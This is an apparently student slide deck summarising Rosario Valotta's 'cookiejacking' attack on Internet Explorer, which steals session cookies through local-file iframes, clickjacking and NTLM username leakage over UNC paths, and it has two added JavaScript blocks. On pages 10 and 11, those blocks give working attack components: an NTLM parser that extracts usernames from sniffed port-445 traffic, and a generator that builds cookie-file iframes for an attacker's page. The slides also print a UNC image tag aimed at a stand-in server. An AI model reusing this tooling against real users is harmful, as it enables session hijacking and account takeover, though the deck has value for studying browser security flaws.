Security researcher finds 'cookiejacking' risk in IE (Presenter: 劉旭哲)

Upload: colleen-farabee, posted 31-Mar-2015

Page 1:

Security researcher finds 'cookiejacking' risk in IE

Presenter: 劉旭哲

Page 2:

• Rosario Valotta (Italy) presented his findings this month at security conferences in Switzerland and Amsterdam
– Could enable hackers to steal cookies from a PC and then log onto password-protected Web sites
– Internet Explorer
– Social networks
– Cookiejacking

Page 3:

• Overview of IE security zones
– IE has 5 default zones (from highest to lowest privilege):
• Local Machine Zone
• Local Intranet Zone
• Trusted Sites Zone
• Internet Zone
• Restricted Sites Zone

Page 4:

• If a web page wants to access a local machine file, it will be reaching from a lower-privileged zone (Internet) into the Local Machine Zone, the most privileged one.
• So it should be impossible for web content to access local machine files.

Page 5:

• So, how to "cookiejack"?
1. Load the cookie file into an iframe:

<iframe src="file:///C:/Documents and Settings/Username/Cookies/Username@Website[1].txt"></iframe>

2. Find a way to access the cookie
3. Guess the victim's username
4. Guess the victim's OS

Page 6:

2. Find a way to access the cookie:
• Use JavaScript
– The Same Origin Policy blocks any programmatic access to local (file://) iframe content from web domains
• Use clickjacking
– Overlapping iframes
» Iframe properly positioned
– CSS opacity
» Iframe made invisible
– The user's clicks are "hijacked"
• Advanced clickjacking
– Content extraction

Page 7:

• Content extraction:
1. The third-party iframe is positioned on the start point of the selection (A)
2. The victim starts to select content (e.g. text or HTML)
3. The third-party iframe is positioned on the end point of the selection (B)
4. The victim stops selecting
5. The third-party iframe is positioned somewhere between A and B
6. The victim drags the selected content into an attacker-controlled iframe

Page 8:

• VIDEO (demo of the drag-and-drop content extraction; only the slide annotations survive here):
– The information the attacker wants
– The image used to trick the victim (a ball)
– The victim tries to drag the ball into the basket, but is actually selecting the text the attacker wants
– Attacker-controlled iframe

Page 9:

3. Guess the victim's username
• file:///C:/Documents and Settings/Username/Cookies/Username@Website[1].txt
• The path of the cookie folder depends on the username currently logged on
• IE supports access to file system objects on SMB shares
– Uses UNC (Universal Naming Convention) paths to reference them
– Can be used without restrictions inside web pages in the Internet zone or above

Page 10:

• Access an image file:
– Force the victim's browser to retrieve a resource like <img src="\\SERVER_IP\img.jpg">
– It will start an NTLM challenge-response negotiation with the remote server
– As part of this negotiation, it sends the Windows username in clear text (the password itself is never sent, only a challenge response derived from it, but the user, domain and workstation names travel as plain strings)
– The attacker only needs a script that sniffs data on TCP port 445 in order to grab the username
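To show why the username is readable on the wire, here is an added example (not code from the slides or from Valotta) that parses an NTLM type 3 AUTHENTICATE_MESSAGE as laid out in MS-NLMP and pulls the domain, user and workstation fields out of a raw byte stream such as reassembled TCP/445 payload. The sample message is constructed inside the block with dummy challenge responses; the names WORKGROUP, alice and VICTIM-PC are made up. Capturing the bytes from the network (pcap, a fake SMB server) is left out; the block starts from the bytes.

```javascript
// Added example: extract the plaintext identity fields from an NTLM
// AUTHENTICATE_MESSAGE (type 3). Layout per MS-NLMP: 8-byte "NTLMSSP\0"
// signature, 4-byte message type, then six 8-byte security buffers
// (Len, MaxLen, BufferOffset) for LmChallengeResponse, NtChallengeResponse,
// DomainName, UserName, Workstation, EncryptedRandomSessionKey, followed by
// 4 bytes of NegotiateFlags at offset 60. Offsets are absolute from the
// message start, so optional Version/MIC fields do not change the parsing.
const NEGOTIATE_UNICODE = 0x00000001;
const SIGNATURE = Buffer.from('NTLMSSP\0', 'latin1');

function secBuf(len, offset) {
  const b = Buffer.alloc(8);
  b.writeUInt16LE(len, 0);     // Len
  b.writeUInt16LE(len, 2);     // MaxLen
  b.writeUInt32LE(offset, 4);  // BufferOffset
  return b;
}

// Constructed sample only: builds a minimal type 3 message the way a client
// would, with zeroed challenge responses (the password-derived parts).
function buildAuthenticateMessage({ domain, user, workstation }) {
  const HEADER_LEN = 64;
  const payload = [
    Buffer.alloc(24, 0),                    // LmChallengeResponse (dummy)
    Buffer.alloc(24, 0),                    // NtChallengeResponse (dummy)
    Buffer.from(domain, 'utf16le'),         // DomainName, plain UTF-16LE
    Buffer.from(user, 'utf16le'),           // UserName, plain UTF-16LE
    Buffer.from(workstation, 'utf16le'),    // Workstation, plain UTF-16LE
    Buffer.alloc(0),                        // EncryptedRandomSessionKey (absent)
  ];
  let off = HEADER_LEN;
  const fields = payload.map((p) => { const s = secBuf(p.length, off); off += p.length; return s; });
  const flags = Buffer.alloc(4);
  flags.writeUInt32LE(NEGOTIATE_UNICODE, 0);
  return Buffer.concat([SIGNATURE, Buffer.from([3, 0, 0, 0]), ...fields, flags, ...payload]);
}

// Parse one message starting at buf[0]; returns null unless it is a type 3.
function parseAuthenticateMessage(buf) {
  if (buf.length < 64) return null;
  if (!buf.subarray(0, 8).equals(SIGNATURE)) return null;
  if (buf.readUInt32LE(8) !== 3) return null;            // type 1/2 carry no username
  const flags = buf.readUInt32LE(60);
  const enc = (flags & NEGOTIATE_UNICODE) ? 'utf16le' : 'latin1';   // OEM strings otherwise
  const readField = (fieldOff) => {
    const len = buf.readUInt16LE(fieldOff);
    const off = buf.readUInt32LE(fieldOff + 4);
    if (off + len > buf.length) return null;             // truncated capture
    return buf.toString(enc, off, off + len);
  };
  const domain = readField(28);
  const user = readField(36);
  const workstation = readField(44);
  if (domain === null || user === null || workstation === null) return null;
  return { domain, user, workstation };
}

// Scan a raw byte stream (e.g. the bytes seen on port 445) for every type 3
// message; this is the "sniff and grab the username" part of the slide.
function findNtlmUsernames(stream) {
  const found = [];
  for (let i = stream.indexOf(SIGNATURE); i !== -1; i = stream.indexOf(SIGNATURE, i + 1)) {
    const msg = parseAuthenticateMessage(stream.subarray(i));
    if (msg) found.push(msg);
  }
  return found;
}

module.exports = { buildAuthenticateMessage, parseAuthenticateMessage, findNtlmUsernames };
```

The point the parser makes concrete: nothing in the message protects the DomainName and UserName buffers, so any host that can get the browser to open a UNC path learns the logged-on account name, which is exactly the piece of the cookie path the attacker is missing.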

Page 11:

4. Guess the victim's OS
• The OS version can be retrieved through a little JS (indexOf() returns -1 when the token is absent):
– XP: navigator.userAgent.indexOf("Windows NT 5.1")
– Vista: navigator.userAgent.indexOf("Windows NT 6.0")
– Win7: navigator.userAgent.indexOf("Windows NT 6.1")
• Different OSs store cookies in different paths:
– Windows XP
» C:/Documents and Settings/user/Cookies/
– Vista and 7
» C:/Users/user/AppData/Roaming/Microsoft/Windows/Cookies/Low/
• Only define iframes that load valid cookies (1 iframe loads 1 cookie)
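Steps 1, 3 and 4 together reduce to turning the user-agent token and the leaked username into exact file:// URLs, one iframe per cookie file, and emitting nothing when the guess is not valid. The block below is an added example, not Valotta's code: it covers the three Windows versions the slides list, takes the "<user>@<site>[1].txt" file-name pattern from the slide, and the usernames and site names it is run with are made up.

```javascript
// Added example: from guessed OS + leaked username to cookie-file iframes.
// Cookie folder per Windows version, keyed by the "Windows NT x.y" token IE
// puts in navigator.userAgent (only the versions the slides cover).
const COOKIE_DIRS = {
  'Windows NT 5.1': (user) => `C:/Documents and Settings/${user}/Cookies/`,                        // XP
  'Windows NT 6.0': (user) => `C:/Users/${user}/AppData/Roaming/Microsoft/Windows/Cookies/Low/`,  // Vista
  'Windows NT 6.1': (user) => `C:/Users/${user}/AppData/Roaming/Microsoft/Windows/Cookies/Low/`,  // 7
};

// Step 4: which Windows version is this? null if none of the known tokens is present.
function detectWindowsToken(userAgent) {
  for (const token of Object.keys(COOKIE_DIRS)) {
    if (userAgent.indexOf(token) !== -1) return token;   // indexOf() is -1 when absent
  }
  return null;
}

// Steps 1 + 3 + 4: candidate cookie-file URLs for the victim. The "[1]"
// suffix and "<user>@<site>.txt" naming follow the pattern shown on the slides.
function cookieFileUrls(userAgent, username, sites) {
  const token = detectWindowsToken(userAgent);
  if (token === null || !username) return [];            // no valid guess: define no iframes
  const dir = COOKIE_DIRS[token](username);
  return sites.map((site) => `file:///${dir}${username}@${site}[1].txt`);
}

// One iframe per cookie file, as markup for the attacker's page
// (positioning and opacity tricks from page 6 are not included here).
function cookieIframes(userAgent, username, sites) {
  return cookieFileUrls(userAgent, username, sites)
    .map((url) => `<iframe src="${url}"></iframe>`)
    .join('\n');
}

module.exports = { detectWindowsToken, cookieFileUrls, cookieIframes };
```

Running it with a macOS or Linux user-agent yields no iframes at all, which is the "only define iframes that load valid cookies" rule from the slide in code: an iframe pointing at a path that does not exist on the victim gives the clickjacking step nothing to extract.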

Page 12:

• Cookiejacking DEMO video

Page 13:

Conclusion

• Allows an attacker to steal session cookies, no XSS needed
• Web site independent: it's a browser flaw
• No clickjacking, no cookiejacking (the attack depends entirely on the clickjacking step succeeding)
• Valotta's experiment:
– Facebook, with 150 friends
– Got above 80 cookies in 3 days
• But Microsoft considers:
– The attack relies on a considerable amount of user interaction (deception + drag and drop), so users are considered unlikely to be attacked in practice